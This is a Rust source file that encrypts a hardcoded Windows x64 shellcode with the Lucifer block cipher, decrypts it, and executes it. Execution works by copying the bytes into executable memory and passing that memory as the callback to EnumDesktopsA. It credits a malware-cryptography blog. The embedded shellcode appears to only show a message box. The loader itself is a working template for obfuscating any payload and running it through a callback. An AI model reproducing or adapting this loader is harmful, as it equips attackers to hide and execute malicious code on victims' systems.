/*
    Lucifer Algorithm 
    Encrypt and Decrypt shellcode using Lucifer Algorithm.
    Credits: Cocomelonc: https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html
    
    @5mukx
*/

use std::mem;
use winapi::{
    ctypes::c_void,
    um::{
        handleapi::CloseHandle, memoryapi::VirtualAlloc, winnt::{RtlMoveMemory, MEM_COMMIT, PAGE_EXECUTE_READWRITE}, winuser::{EnumDesktopsA, GetProcessWindowStation}
    },
};

const BLOCK_SIZE: usize = 16;
const KEY_SIZE: usize = 16;
const ROUND_COUNT: usize = 16;
const STEP_COUNT: usize = 8;


static S0: [u8; 16] = [
    0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00, 0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08,
];

static S1: [u8; 16] = [
    0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04, 0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05,
];

static M1: [u8; 8] = [0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01];
static M2: [u8; 8] = [0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE];

// Helper functions
fn shift_left(x: u8, n: u8) -> u8 {
    x << n
}

fn shift_right(x: u8, n: u8) -> u8 {
    x >> n
}

fn highsubbyte(x: u8) -> u8 {
    x >> 4
}

fn lowsubbyte(x: u8) -> u8 {
    x & 0x0F
}

// Lucifer function
fn lucifer(block: &mut [u8; BLOCK_SIZE], key: &[u8; KEY_SIZE], decrypt: bool) {
    let (lower_half, upper_half) = block.split_at_mut(BLOCK_SIZE / 2);

    let mut key_byte_idx = if decrypt { 8 } else { 0 };

    for _round in 0..ROUND_COUNT {
        if decrypt {
            key_byte_idx = (key_byte_idx + 1) % ROUND_COUNT;
        }

        for step in 0..STEP_COUNT {
            let mut message_byte = upper_half[step];

            // Confusion
            if key[key_byte_idx] & M1[STEP_COUNT - step - 1] != 0 {
                message_byte = shift_left(S1[highsubbyte(message_byte) as usize], 4) | S0[lowsubbyte(message_byte) as usize];
            } else {
                message_byte = shift_left(S0[highsubbyte(message_byte) as usize], 4) | S1[lowsubbyte(message_byte) as usize];
            }

            // Key interruption
            message_byte ^= key[key_byte_idx];

            // Permutation
            message_byte = (shift_right(message_byte & M1[0], 3))
                | (shift_right(message_byte & M1[1], 4))
                | (shift_left(message_byte & M1[2], 2))
                | (shift_right(message_byte & M1[3], 1))
                | (shift_left(message_byte & M1[4], 2))
                | (shift_left(message_byte & M1[5], 4))
                | (shift_right(message_byte & M1[6], 1))
                | (shift_left(message_byte & M1[7], 1));

            // Diffusion
            for i in 0..STEP_COUNT {
                let idx = (step + i) % STEP_COUNT;
                lower_half[idx] = ((message_byte ^ lower_half[idx]) & M1[i]) | (lower_half[idx] & M2[i]);
            }

            if step < STEP_COUNT - 1 || decrypt {
                key_byte_idx = (key_byte_idx + 1) % ROUND_COUNT;
            }
        }

        // Swap halves
        for i in 0..BLOCK_SIZE / 2 {
            std::mem::swap(&mut lower_half[i], &mut upper_half[i]);
        }
    }

    // Physically swap halves
    for i in 0..BLOCK_SIZE / 2 {
        block.swap(i, i + BLOCK_SIZE / 2);
    }
}


fn lucifer_encrypt_payload(payload: &mut [u8], key: &[u8; KEY_SIZE]) {
    for block in payload.chunks_exact_mut(BLOCK_SIZE) {
        lucifer(block.try_into().unwrap(), key, false);
    }
}

fn lucifer_decrypt_payload(payload: &mut [u8], key: &[u8; KEY_SIZE]) {
    for block in payload.chunks_exact_mut(BLOCK_SIZE) {
        lucifer(block.try_into().unwrap(), key, true);
    }
}

fn main() {
    let key_str = "5mukx";

    let key: [u8; KEY_SIZE] = {
        let mut temp = [0u8; KEY_SIZE];
        temp[..key_str.len()].copy_from_slice(key_str.as_bytes());
        temp
    };

    let mut shellcode: Vec<u8> = vec![
        0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
        0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
        0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
        0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
        0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
        0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
        0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
        0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
        0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
        0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
        0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
        0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
        0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
        0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
        0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
        0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
        0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
        0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
        0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
        0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
        0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
        0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
        0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
        0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
        0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
        0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
        0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00
    ];

    // Padding
    let pad_len = (BLOCK_SIZE - shellcode.len() % BLOCK_SIZE) % BLOCK_SIZE;
    shellcode.extend(vec![0x90; pad_len]);

    println!("Original payload:");
    for byte in &shellcode {
        print!("{:02x} ", byte);
    }
    println!("\n");

    lucifer_encrypt_payload(&mut shellcode, &key);

    println!("Encrypted payload:");
    for byte in &shellcode {
        print!("{:02x} ", byte);
    }
    println!("\n");

    lucifer_decrypt_payload(&mut shellcode, &key);

    println!("Decrypted payload:");
    for byte in &shellcode {
        print!("{:02x} ", byte);
    }
    println!("\n");

    unsafe {
        let mem = VirtualAlloc(
            std::ptr::null_mut(),
            shellcode.len(),
            MEM_COMMIT,
            PAGE_EXECUTE_READWRITE,
        );

        if !mem.is_null() {
            RtlMoveMemory(mem, shellcode.as_ptr() as *mut c_void, shellcode.len());

            EnumDesktopsA(GetProcessWindowStation(), mem::transmute(mem), 0);

            CloseHandle(mem);
        }
    }
}

